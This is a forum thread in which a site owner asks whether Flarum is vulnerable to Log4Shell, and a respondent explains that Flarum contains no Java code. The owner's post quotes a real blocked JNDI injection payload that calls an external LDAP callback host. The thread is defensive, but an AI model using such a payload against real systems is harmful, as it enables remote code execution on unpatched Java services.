Is flarum secure about log4j Exploit

fakruzaruret

Hello, I get notification because of an attack type on my wordpress website. This attack is blocked because of log4j

It is blocked because of query tex include log4j CVE-2021-44228 : x = ${jndi:ldap://${:-476}${:-375}.${hostName}.uri.cmm0sh5t4s1a9bcav2n0pum4bj64tgfec.oast.pro/a}

About log4j exploit:

https://builtin.com/cybersecurity/log4j-vulerability-explained

Is flarum secure for this attack type?

clarkwinkelmann

fakruzaruret Flarum does not contain any java code, so no core feature or extension can use log4j anyway.

If you are integrating Flarum with other tools, like a log aggregator or a web firewall that's written in java, then you might want to take a look at the release notes for that other tool and see if they were impacted.

Bad actors will try those known injections everywhere online in the off chance they catch something not patched.

WordPress wouldn't be impacted either, but there's always the possibility that the value stored in WP then gets picked up by another software on the server that does use log4j.

fakruzaruret

clarkwinkelmann thank you very much, now I feel more confident and secure thanks to your statements.